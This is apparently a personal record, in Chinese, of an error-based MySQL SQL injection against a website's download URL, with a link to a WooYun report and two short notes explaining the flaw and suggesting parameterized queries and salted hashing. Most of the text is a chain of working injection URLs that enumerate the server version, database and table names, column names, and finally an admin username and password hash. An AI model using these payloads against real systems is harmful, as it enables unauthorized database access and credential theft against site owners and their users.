http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试 没想到这有 可以测试下做个记录而已
(说明:从下面的结果看,URL 路径中的 id 值应是未经参数化直接拼进了 SQL,并且页面回显了 MySQL 的报错信息;这些语句借助 count(*) 与 group by floor(rand(0)*2) 触发重复键错误,使子查询的结果出现在报错文本里。修复方向是对 id 使用参数化查询或严格的整数校验,并关闭对外的数据库错误回显。)
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
(说明:该值为 32 位十六进制,形似 MD5 摘要;若口令确实以这种快速哈希存储,应改为加盐的慢哈希,例如 bcrypt。)